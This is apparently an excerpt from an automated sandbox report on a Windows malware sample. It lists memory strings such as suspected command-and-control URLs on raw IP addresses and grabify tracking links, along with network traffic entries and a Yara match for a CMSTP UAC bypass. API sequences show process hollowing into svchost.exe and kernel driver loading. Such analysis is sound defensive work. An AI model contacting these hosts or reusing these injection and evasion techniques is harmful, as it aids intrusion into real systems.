                    Source: tzutil.exe, 00000008.00000003.1530969421.0000000002658000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.1563941304.0000000000563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1
                    Source: tzutil.exe, 00000008.00000003.1532766643.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1531193943.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1530597270.0000000002655000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1531370230.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1530721748.0000000002658000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1532471628.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.1564778881.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1530502238.0000000002654000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1527862180.0000000002654000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1532619549.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1530969421.0000000002658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1-
                    Source: tzutil.exe, 00000008.00000003.1532766643.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1531193943.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1530597270.0000000002655000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1531370230.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1530721748.0000000002658000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1532471628.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.1564778881.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1530502238.0000000002654000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1527862180.0000000002654000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1532619549.0000000002659000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1530969421.0000000002658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d11
                    Source: tzutil.exe, 00000008.00000002.1563941304.0000000000563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1PCUSERD
                    Source: svchost.exe, 00000004.00000002.2571466574.000001C3DC4CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571643710.000001C3DDE03000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571643710.000001C3DDDFF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://107.174.192.179/clean
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, 00000000.00000002.1322422247.0000000000475000.00000004.00000001.01000000.00000003.sdmp, svchost.exe, 00000004.00000002.2571150204.000001C3DC413000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571177550.000001C3DC467000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2570887017.00000042D3D76000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571466574.000001C3DC4CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571643710.000001C3DDE03000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571643710.000001C3DDDFF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://107.174.192.179/data/003
                    Source: tzutil.exe, 00000008.00000003.1556329975.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, bS4Vs_8188.sys.8.drString found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
                    Source: tzutil.exe, 00000008.00000003.1556329975.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, bS4Vs_8188.sys.8.drString found in binary or memory: http://cs-g2-crl.thawte.com/ThawteCSG2.crl0
                    Source: powershell.exe, 0000000C.00000002.1595627160.00000262C8BB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1685956631.0000024A71131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: tzutil.exe, 00000008.00000003.1556329975.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, bS4Vs_8188.sys.8.drString found in binary or memory: http://ocsp.thawte.com0
                    Source: powershell.exe, 0000000E.00000002.1601005633.0000024A612E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 0000000C.00000002.1556862667.00000262B8D68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1601005633.0000024A612E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 0000000C.00000002.1556862667.00000262B8B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1601005633.0000024A610C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000000C.00000002.1556862667.00000262B8D68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1601005633.0000024A612E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 0000000E.00000002.1601005633.0000024A612E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 0000000E.00000002.1703256537.0000024A79A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co2l
                    Source: powershell.exe, 0000000C.00000002.1556862667.00000262B8B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1601005633.0000024A610C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 0000000E.00000002.1685956631.0000024A71131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000E.00000002.1685956631.0000024A71131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000E.00000002.1685956631.0000024A71131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: tzutil.exe, tzutil.exe, 00000008.00000002.1564260852.00000000008C0000.00000040.00000001.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.1564956187.0000000140010000.00000004.00000001.01000000.00000005.sdmp, w32tm.exe, w32tm.exe, 0000000B.00000002.1595461638.0000000140075000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                    Source: tzutil.exe, w32tm.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
                    Source: w32tm.exe, 0000000B.00000002.1595461638.0000000140075000.00000002.00000001.01000000.00000006.sdmp, w32tm.exe, 0000000B.00000003.1536509796.000000000209D000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000B.00000003.1543203507.000000000209C000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000B.00000003.1536437127.000000000209D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe
                    Source: w32tm.exe, 0000000B.00000002.1595211576.00000000025DA000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000B.00000003.1593579542.00000000025D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exeRb
                    Source: powershell.exe, 0000000E.00000002.1601005633.0000024A612E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: tzutil.exe, 00000008.00000003.1559395480.0000000002667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/U7WLGD
                    Source: tzutil.exe, 00000008.00000002.1564825431.0000000002667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/U7WLGDCC
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, 00000000.00000002.1322422247.0000000000475000.00000004.00000001.01000000.00000003.sdmp, svchost.exe, 00000004.00000002.2571150204.000001C3DC413000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571177550.000001C3DC467000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571466574.000001C3DC4CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571643710.000001C3DDE03000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571643710.000001C3DDDFF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/ZATFQO
                    Source: svchost.exe, 00000004.00000002.2571466574.000001C3DC4CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/images/pixe
                    Source: svchost.exe, 00000004.00000002.2571466574.000001C3DC4CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/images/pixel.png
                    Source: svchost.exe, 00000004.00000002.2571466574.000001C3DC4CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/images/pixel.pngLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedExp
                    Source: powershell.exe, 0000000C.00000002.1595627160.00000262C8BB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1685956631.0000024A71131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknownHTTPS traffic detected: 104.26.8.202:443 -> 192.168.2.6:49689 version: TLS 1.2
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDB2310 WaitForSingleObject,RtlExitUserThread,GetAsyncKeyState,Sleep,OpenEventW,SetEvent,CloseHandle,RtlExitUserThread,4_2_000001C3DDDB2310

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 4.2.svchost.exe.1c3ddda0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_004112DC CreateEventW,GetModuleHandle64,GetProcAddress64,X64Call,WaitForSingleObject,ResetEvent,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,0_2_004112DC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_00406DB0 GetCurrentProcess,CreateProcessW,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,0_2_00406DB0
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDB0740 CreateProcessW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,LoadLibraryW,GetProcAddress,GetProcAddress,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,CreateEventW,RtlCreateUserThread,WaitForSingleObject,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle,4_2_000001C3DDDB0740
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDA7940 GetCurrentProcess,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetThreadContext,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,TerminateProcess,4_2_000001C3DDDA7940
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDB11A4 CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle,4_2_000001C3DDDB11A4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008C5D7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,RegOpenKeyA,wsprintfA,RegCreateKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,wsprintfA,RegSetValueExA,MultiByteToWideChar,wsprintfW,NtLoadDriver,RegCloseKey,RegCloseKey,8_2_008C5D7C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008C5D7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,RegOpenKeyA,wsprintfA,RegCreateKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,wsprintfA,RegSetValueExA,MultiByteToWideChar,wsprintfW,NtLoadDriver,RegCloseKey,RegCloseKey,8_2_008C5D7C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeFile created: C:\Windows\Temp\bS4Vs_8188.sysJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeFile deleted: C:\Windows\Temp\bS4Vs_8188.sysJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_0040E1C80_2_0040E1C8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_004258F70_2_004258F7
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDA7EF04_2_000001C3DDDA7EF0
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDC5E504_2_000001C3DDDC5E50
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDBD6004_2_000001C3DDDBD600
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDA4DA04_2_000001C3DDDA4DA0
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDA10004_2_000001C3DDDA1000
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDC23404_2_000001C3DDDC2340
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDB9D204_2_000001C3DDDB9D20
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDB07404_2_000001C3DDDB0740
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDD67084_2_000001C3DDDD6708
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDB26904_2_000001C3DDDB2690
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDADE204_2_000001C3DDDADE20
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDA79404_2_000001C3DDDA7940
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDAE8C04_2_000001C3DDDAE8C0
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDAA8C04_2_000001C3DDDAA8C0
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDAB8B04_2_000001C3DDDAB8B0
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDBD0304_2_000001C3DDDBD030
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDC27904_2_000001C3DDDC2790
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDD3B2C4_2_000001C3DDDD3B2C
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDB12B04_2_000001C3DDDB12B0
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDCE9BC4_2_000001C3DDDCE9BC
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDCF9644_2_000001C3DDDCF964
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDBAD504_2_000001C3DDDBAD50
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDBC5014_2_000001C3DDDBC501
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDC9D1C4_2_000001C3DDDC9D1C
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDBA5104_2_000001C3DDDBA510
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDBC4804_2_000001C3DDDBC480
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDCCC2C4_2_000001C3DDDCCC2C
